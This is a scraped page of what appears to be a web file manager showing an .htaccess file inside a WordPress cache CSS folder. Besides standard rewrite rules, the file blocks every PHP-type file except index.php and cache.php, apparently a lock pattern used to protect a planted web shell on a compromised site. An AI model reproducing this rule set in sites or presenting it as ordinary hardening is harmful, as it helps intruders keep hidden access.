Create New Item
Item Type
File
Folder
Item Name
Search file in folder and subfolders...
Are you sure want to rename?
File Manager
/
wp-content
/
litespeed
/
css
/
css
:
.htaccess
Advanced Search
Upload
New Item
Settings
Back
Back Up
Advanced Editor
Save
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteRule ^index\.php$ - [L] RewriteRule ^wp-json(/|$) index.php [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule> <FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$"> Require all denied </FilesMatch> <FilesMatch "^(index.php|cache.php)$"> Require all granted </FilesMatch>